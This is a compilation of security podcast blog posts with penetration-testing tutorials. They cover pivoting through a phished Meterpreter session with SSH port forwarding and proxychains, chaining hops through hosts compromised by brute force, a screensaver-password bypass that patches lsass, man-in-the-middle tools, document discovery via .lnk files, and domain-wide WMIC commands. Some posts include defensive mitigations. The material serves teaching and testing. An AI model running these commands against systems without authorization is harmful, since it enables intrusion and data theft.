We'll have Richard "Bonecrusher" Bejtlich, Director of Incident Response at GE, and Ron "Tenacious" Gula, CEO of Tenable Network Security, debate the pros and cons of having a strong IT controls program vs. one focused on responding to threats. Ron will fearlessly defend the practice of a controls program while Rich will bring bone crushing rebuttals for a threat-centric monitoring program.

Please join the IRC channel during the stream - we can take live comments and discussion from the channel! Find us on IRC at irc.freenode.net #pauldotcom.

When active, the live stream(s) can be found at:

PaulDotCom Live! - You can watch, listen, and chat during each episode! You can access the streaming videos at any time by visiting http://pauldotcom.com/live/

PaulDotCom Icecast Radio (Audio Only)

Break out your adult beverage of choice and join us, enjoy the show live, and thanks for listening!

- Paul, Larry, Carlos, Darren, John & Mick

Episode 190 Show Notes

Hosts: Larry "HaxorTheMatrix" Pesce, Paul "PaulDotCom" Asadoorian, John Strand, Mick Douglas, Carlos "Dark0perator" Perez

Audio Feeds:

Scenario: You are doing a penetration test. The client's internet face is locked down pretty well. No services are exposed externally and only HTTP/HTTPS are allowed OUT of the corporate firewall. You email in a carefully crafted email with the meterpreter attacked. An accommodating users is more than happy to click your attachment giving you meterpreter access to their machine. Now what? How about using Nessus to scan all the services on their internal network? Here is a tutorial on how to do it.

The Players
Attacker 172.16.186.132
Victim 172.16.186.126

Step 1 - After you have meterpreter access install OpenSSH on the victim's computer. Joff Thyer, packet guru, crazy aussie and all around smart guy did a great job of outlining the install process on his blog. I pretty much just followed his instructions here.

Step 2 - After you've installed OpenSSH and setup your account use Meterpreters PORTFWD command to forward a port from the attacker's machine to the SSH listener on the victim's machine. For example:

meterpreter> portfwd add -L 172.16.186.132 -l 8000 -r 172.16.186.128 -p 22

This command sets up a listener on port 8000 of the attacker's IP (172.16.186.132) and forwards packets to port 22 on the victim's machine (172.16.186.128).

Step 3 - SSH into the portfwd port you just created and setup a dynamic port forwarder on your machine. For example:

# ssh -D 127.0.0.1:9000 -p 8000 username@172.16.186.132

This command sets up a SOCKS4 proxy on port 9000 which is forwarded through the SSH session on the victim.

Step 4 - Use PROXYCHAINS to forward your nessusd traffic through the SOCKS4 listener on port 9000. This is as simple as changing the TCP port on the last line of /etc/proxychains.conf from its default of 9050 to port 9000 and launching nessusd through proxychains as follows:

# proxychains /usr/sbin/nessusd -D

Step 5 - Start the nessus client and do you scan.

If you're not familiar with proxychains be sure to check out the post from last week.

Here is a video demo:

Nessus Scan through a Meterpreter Session from PaulDotCom on Vimeo.

Mark Baggett is teaching SANS 504 in Raleigh NC June 21st! Click here for more information.

Please join the IRC channel during the stream - we can take live comments and discussion from the channel! Find us on IRC at irc.freenode.net #pauldotcom.

When active, the live stream(s) can be found at:

PaulDotCom Livestream - All new with Video and Chat! You can access the streaming videos at any time by visiting http://pauldotcom.com/live/

PaulDotCom Icecast Radio

Break out your adult beverage of choice and join us, enjoy the show live, and thanks for listening!

- Larry, Mick, Carlos, John, Darren & Paul

Top ten tips to socially engineer management into implementing security the right way, plus all sorts of interesting stories including the "porn detection stick"!

Hosts: Larry "HaxorTheMatrix" Pesce, Paul "PaulDotCom" Asadoorian, John Strand, Mick Douglas, Carlos "Dark0perator" Perez

Audio Feeds:

Also, there were rumors we won an award somewhere for something ...

Please join the IRC channel during the stream - we can take live comments and discussion from the channel! Find us on IRC at irc.freenode.net #pauldotcom.

When active, the live stream(s) can be found at:

PaulDotCom Livestream - All new with Video and Chat! You can access the streaming videos at any time by visiting http://pauldotcom.com/live/

PaulDotCom Icecast Radio

Break out your adult beverage of choice and join us, enjoy the show live, and thanks for listening!

- Paul, Larry, John, Carlos, Mick & Darren

Proxychains is a Linux dynamically loadable library that will intercept any TCP and UDP traffic from a specific process and tunnel it over HTTP, SOCKS4 or SOCKS5 proxy. For this discussion I will be focusing on SOCKS4 proxies setup with the SSH -D parameter. Proxychains is already installed in Backtrack4 and configured to tunnel over a SOCKS4 listener on port 9050 on the local host. By default, proxychains uses the configuration file /etc/proxychains.conf. But Proxychains will look for a proxychains.conf file in the current working directory and use it if one exists. To illustrate how an attacker or penetration tester can use this powerful tool let us look at the following scenario. The attacker is attempting to gain access to the TARGET host at 10.10.1.2 on the following network. (Note the super 1337 Visio skills)

View image

The attacker brute forced valid credentials to the public SSH service on 192.168.100.13. Then they cracked passwords obtained from that machine and used them to find valid credentials on a second DMZ host at 192.168.100.15. That host, has two network cards and the second network interface straddles the corporate firewall and connect to the internal network where our target 10.10.1.2 sits. Note that for this attack to work the second host is not required to straddle the firewall, it just needs to have firewall rules in place that allow it to access the internal target.

The attacker starts his attack by connecting to the external SSH listener at 192.168.100.13 as follows:

View image

"-D 127.0.0.1:9050" causes a dynamic port forwarder to start on port 9050 of the attackers local host. Since the default proxychains.conf file already has an entry to proxy on port 9050 (tor's default) all the attacker has to do is launch a program and proceed it with "proxychains" and all its traffic will be shoveled to the host 192.168.100.13. If the attacker ran:

>proxychains wget localhost

They would get back the website listening on port 80 on host 192.168.100.13. But I want to bounce off that server and gain access to 192.168.100.15. So I could do this:

>proxychains ssh user@192.168.100.15

That would make an SSH connection into 192.168.100.15. On that host it would appear that the connection came from 192.168.100.13. In this case after I make the connection to 192.168.100.15 I really want to pivot a second time to get to the internal host. So I run the following:

View image

What is really awesome here is that this establishes a NEW dynamic port forwarder on the attackers localhost at port 8090. The attacker now has the multiple dynamic port forwarders listening on his host. The first port forwarder on 9050 takes him into 192.168.100.13 and the second on 8090 takes him to 192.168.100.15. The attacker can use proxychains again with a different configuration file to tunnel all the TCP and UDP packets from a program to execute on the second pivot point at 192.168.100.15. To do this I did the following:

>mkdir aconf
>cd aconf
>cat /etc/proxychains.conf | sed "s/127.0.0.1 9050/127.0.0.1 8090/g" > ./proxychains.conf

or you can use your favorite editor to change the port at the bottom of the configuration file. Then from the directory containing my new configuration file I ran this:

View image

Which started the NESSUS server daemon and allowed me to do a full vulnerability scan on the internal host. Nessusd worked great over proxychains! Nmap, Metasploit and others also worked well. To launch Metasploit using proxychains you'd simply run the following:

View image

Here is a quick video showing how quickly you pivot through hosts and capture the target.

SSH Gymnastics from PaulDotCom on Vimeo.

PREVENTION:
I hear you, "Dude... That is scary. How do I prevent this from happening?"
Well, first be sure to minimize the ports you open between hosts and don't have host that straddle your firewall. Second, you can turn off port forwarding in your sshd configuration files. Edit /etc/ssh/sshd_config and set "AllowTCPForwarding to NO". While your in there make all these changes. Remember that if an attacker has a shell they can install their own forwarders or use netcat so this is just one step in trying to preventing the host from being a relay. It does make the attacker job much harder when you turn off the DEFAULT mode of being a relay.

Additional References:
http://pauldotcom.com/2009/08/scanning-through-a-tor-network.html
http://netwarsplayers.googlegroups.com/web/SSH+Tunneling+In+The+Context+Of+Netwars.pdf
http://www.securityfocus.com/infocus/1816
http://proxychains.sourceforge.net/

Shout out to Jim Shewmaker and ace1 over at SANS Netwars. Ace1's excellent paper inspired me to take another look at proxychains.
Note: proxychains support CHAINS of proxies (imagine that). There is probably a more elegant way to do this using just one configuration file and a strict chain. Do you know how? Leave me a comment!

Mark Baggett is teaching SANS 504 in Raleigh NC June 21st! Click here for more information.

On Wednesday, March 17th, please join DShield founder and SANS CSO Johannes Ullrich in a unique seminar at a tremendous discount to PaulDotCom listeners!

The IPv6 Survival Guide class will introduce you to the very basics of IPv6 and answer questions such as:
- What are those long addresses about and how are they assigned?
- What is the difference between different tunnel technologies like 6-to-4, teredo, isatap and more?
- Will IPv6 work with my systems?
- How do I filter IPv6 and how do I detect if I already use it?

Johannes will also go over some of the new features offered by IPv6 like mobile IP, jumbo packets and auto configuration.

Date: Wednesday, March 17, 2010
Time: 3:00 PM - 5:00 PM EDT
Cost: $20 with discount code ($195.00 retail)
Discount Code: IPV6PDC
URL: http://www.sans.org/vlive/details.php?nid=21504

Johannes will also be teaching Security 503: Intrusion Detection In-Depth, a 36-hr course, on vLive! beginning April 12.

NOTE: Use discount code 503PDC for a $250 discount on the above class!

- PaulDotCom Crew

Please join the IRC channel during the stream - we can take live comments and discussion from the channel! Find us on IRC at irc.freenode.net #pauldotcom.

When active, the live stream(s) can be found at:

PaulDotCom Live! - You can watch, listen, and chat during each episode! You can access the streaming videos at any time by visiting http://pauldotcom.com/live/

PaulDotCom Icecast Radio (Audio Only)

Break out your adult beverage of choice and join us, enjoy the show live, and thanks for listening!

- Paul, Larry, Carlos, Darren, John & Mick

Lets face it, security guys love their password protected screensavers. I am no exception. Without it, many users would likely never lock their computers. This simple mechanism may slow down or in some cases completely prevented the attacker from accessing resources on a remote machine. A strong password on a screensaver was one of the hurdles that you had to overcome in the Christmas 2008 Ethical Hacker challenge, "Santa Claus is hacking to town". Santa really could have used this script.

The Relentless-coding blog recently posted a meterpreter script that bypasses the screensaver password protection. The script patches the lsass process running in memory where the codes check the validity of the password that was entered. After the patch is applied the attacker can enter ANY password to unlock the screensaver. The script works on Windows XP SP2, SP3, Windows Vista and Windows 7. Lets take a look at the script in action:

Meterpreter Screensaver unlock script from PaulDotCom on Vimeo.

The script isn't currently part of the metasploit distribution so you'll need to download it from the Relentless-coding site. Save it to your "scripts/meterpreter" directory in your Metasploit installation. In a Backtrack installation you'll find that directory under "/pentest/exploits/framework3/scripts/meterpreter".

Mark Baggett is teaching SANS 504 in Raleigh NC June 21st! Click here for more information.

• DNS Cache Poisoning (metasploit)
• NETBIOS Names spoofing (nbtool at skullsecurity.org)
• Lie about the DNS,WINS and/or default gateway with a rouge DHCP server (yersinia, ettercap)
• deliver a WPAD file or otherwise reconfigure the browser proxy (metasploit)
• IPv6 ISATAP spoofing
• Attack routing protocols such as BGP MITM
• IP source routing attacks (netcat)
• ICMP Redirect messages (ettercap)
• ARP Cache Poisoning (yersinia, ettercap, cain)
• Switch Port Stealing (ettercap)
• Layer2 Mac Flooding* (yersinia, macflood, macof)
• Gratuitous Spanning Tree BPDU Root messages* (yersinia)

Some of these attacks work across the internet, but most of these are limited to the LAN and rely on Layer2. The good news is that many of these attacks can be mitigated with new features deployed in the latest version of Cisco's IOS (12.2 or better). BPDU Guard, DHCP Snooping, DHCP Snooping +Dynamic Arp Inspection , DHCP Snooping + IP Source Guard, ARP Rate Limiting, Mac Address port security, PVLAN Protected, Isolated, Community and Promiscuous ports and 802.1x can all be used to effectively limit many of these attacks. Listener Brian Almond (Infosec Samurai) submitted this PDF on layer two security. Give it a gander! Nice work Brian.

Download Brian Almond's paper here

Other resources

http://isc.sans.org/diary.html?storyid=7567

http://www.ciscopress.com/articles/article.asp?p=1181682

http://www.cisco.com/en/US/docs/switches/lan/catalyst4500/12.1/19ew/configuration/guide/dhcp.html

http://www.cisco.com/en/US/docs/switches/lan/catalyst4500/12.1/19ew/configuration/guide/dynarp.html

http://www.cisco.com/en/US/docs/switches/lan/catalyst4500/12.1/19ew/configuration/guide/bcastsup.html

http://www.cisco.com/en/US/docs/switches/lan/catalyst4500/12.1/19ew/configuration/guide/port_sec.html

Mark Baggett is teaching SANS 504 in Raleigh NC June 21st! Click here for more information.

Figure 1: strings output of a Linux VM's memory image. The highlighted "forensics" happens to be the root password.

Shortly after Carey's presentation, DarkOperator posted a Meterpreter script that would dump memory and save it offline for later analysis. Passwords are a high value memory artifact for penetration testers. As someone working in app sec and incident response, Carey got me thinking about other things that forensics practitioners may find commonplace, but that may be overlooked by penetration testers. Both disciplines inform each other.

Let's say you're a penetration tester (or an Amortized Perennial Threat as Shawn Moyer says he is) and you're working for a client who wants you to go beyond the shell. Your client has requested that you go after important company data. Databases are an obvious target, but companies also have critical information floating around in Microsoft Office documents (e.g. business plans, bid contracts, vulnerability remediation tracking information, etc.).

What is the best way to locate these documents? You could manually navigate the various common directories where people store documents, read the directory listings and copy down those files that look interesting. But this is a labor intensive process and you may miss something if the user has tucked important files in odd locations.

If only there were a place on the file system that held information about files, a place where we could look and see all of the files that had been opened on the system and that would map back to the location of those files, even if those files were on network shares or removable media. Fortunately for us, there is such a location, in fact, there are two well known ones.

Windows systems have a feature that creates shortcuts for common document types, including Office files when those files are opened by a user. The idea of using these shortcuts during a pen test is not new. In fact, it was mentioned before on Security Focus' Pen-Test mailing list, but I don't believe it's been ahem, weaponized until now.

These shortcuts or link files are created by Windows to facilitate the "Recent" document features of modern Windows operating systems. For Windows XP the default location for link files is under Documents and Settings\<username>\Recent with Microsoft Office files having their own location in Documents and Settings\<username>\Application Data\Microsoft\Office\Recent\. Vista and later versions of Windows have moved the recent link files to Users\<username>\AppData\Roaming\Microsoft\Windows\Recent\ and Users\<username>\AppData\Roaming\Microsoft\Office\Recent. There may be other locations specific to other applications as well.

For the two common locations, I have created a Meterpreter script port of Harlan Carvey's lslnk.pl that is commonly used by forensics analysts to dump the contents of Windows' .lnk files.

dumplinks.rb can be used with the Meterpreter to dump the contents of Windows' .lnk files either to the Metasploit user's local file system, or to the console. By default, dumplinks.rb, runs in a less verbose mode than Carvey's lslnk.pl, in that it only reports the time stamps for the .lnk files themselves, then prints the time stamps contained within the .lnk files that are time stamps for the target file and finally, the target file's location is printed.

Enough drivel, here's a couple of screen shots:
Figure 2: dumplinks help screen

And one of the script in action, dumping to the console:
Figure 3: dumplinks sending everything to the console

Of course there are other tools and techniques that cross-over from forensics to penetration testing. I will be back with another, as soon as I can find the time. For now, enjoy the dumplinks.

Dave Hull describes his working life as on the Venns between incident response, forensics and web applicaiton security. He will be teaching SANS Forensics 508: Computer Forensics Investigation and Incident Response in Boston, March 15 - 20

After listening to Larry's excellent technical segment on dumping the event logs from a large list of computers, I decided to try it out on my own. If you missed the technical segment, you can find the notes here.    To do my own testing I needed to start with a large list of computers.   For my list, I want to have the names of every computer in the domain.   So I turned to "dsquery computer " to get a list of all computers. 

C:\WINDOWS> dsquery computer 

"CN=CONTROLER1,OU=Domain Controllers,DC=subdomain,DC=domain,DC=com"

BLA BLA BLA... Truncated

"CN=WORKSTATION1,OU=ORGUNIT1,OU=OrgUnit2,OU=OrgUnit3,DC=Subdomain,DC=Domain,DC=com"

BLA BLA BLA... Truncated again

The length of the results changes because of the variable number of subdomains, but fortunetly for us the workstation name is always the first part of the string.  It is always between the CN= and the first comma. We can strip out the workstation name with the "DELIMS" and "TOKENS" option of the FOR loop.  Also, by default DSQUERY will only return the first 100 results. This can be changed using the "-LIMIT" option. Setting the LIMIT to 0 returns all result. For now lets check our output looking at only two entries.

C:\WINDOWS>for /F "delims=, tokens=1" %i in ('dsquery computer -limit 2') do echo %i

C:\WINDOWS>echo "CN=WORKSTATION1

"CN=WORKSTATION1

C:\WINDOWS>echo "CN=WORKSTATION2

"CN=WORKSTATION2

We are almost there. I need to strip the first 4 characters of the line. For this I stole a page or two from Ed Skoudis' play book. We can strip the first four characters with the SET command using the expression variable = %variable:~4%. But, since we are in a FOR loop we have to turn on delayed variable expansion and use ! instead of %.

C:\WINDOWS>cmd.exe /v:on /c "for /F "delims=, tokens=1" %i in 

('dsquery computer -limit 2') do set name=%i  & set name=!name:~4! & echo !name!"

Dsquery has reached the specified limit on number of results to display; use a different value for the -limit option to display more results.

C:\WINDOWS>set name="CN=WORKSTATION1    & set name=!name:~4!   & echo !name!

WORKSTATION1

C:\WINDOWS>set name="CN=WORKSTATION2    & set name=!name:~4!   & echo !name!

WORKSTATION2

Now we have all the computer names in the domain being printed one at a time. I can dump all the names of the machines in the domain to file to feed Larry's event dumper.

C:\WINDOWS>cmd.exe /v:on /c "for /F "delims=, tokens=1" %i in ('dsquery computer -limit 0') do set name=%i & set name=!name:~4! & echo !name! >> c:\temp\machines.txt"

Better yet, we could combine it with a WMIC command and other commands to do various useful tasks on our machines.  For example, if I want to query every machine in my network for an instance of a process that starts with CMD I could run the following:  (remember that % is a wild card in wmic)

C:\WINDOWS>cmd.exe /v:on /c "for /F "delims=, tokens=1" %i in ('dsquery computer -limit 2') do set name=%i  & set name=!name:~4! & wmic /node:!name! process where "name like 'cmd%'" list brief"

Dsquery has reached the specified limit on number of results to display; use a different value for the -limit option to display more results.

C:\WINDOWS>set name="CN=WORKSTATION1    & set name=!name:~4!   & wmic /node:!name! process where "name like 'cmd%'" list brief

HandleCount  Name     Priority  ProcessId  ThreadCount  WorkingSetSize

33           cmd.exe  8         2308       1            1654784

C:\WINDOWS>set name="CN=WORKSTATION2    & set name=!name:~4!   & wmic /node:!name! process where "name like 'cmd%'" list brief

HandleCount  Name     Priority  ProcessId  ThreadCount  WorkingSetSize

33           cmd.exe  8         2368       1            1626112

So there you go.  Now using this basic syntax...

cmd.exe /v:on /c "for /F "delims=, tokens=1" %i in ('dsquery computer -limit 0') do set name=%i  & set name=!name:~4! & Any command here based on !name!

... you can run any command you want on every machine in your domain.   

Join me for SANS 504 June 21-26

Episode 187 Show Notes

Part 1: Pwning VMware and the Smart Grid...

Part 2: Windows command line kung fu and discussion of the stories for the week!

Hosts: Larry "HaxorTheMatrix" Pesce, Paul "PaulDotCom" Asadoorian, John Strand, Mick Douglas, Carlos "Dark0perator" Perez

Audio Feeds: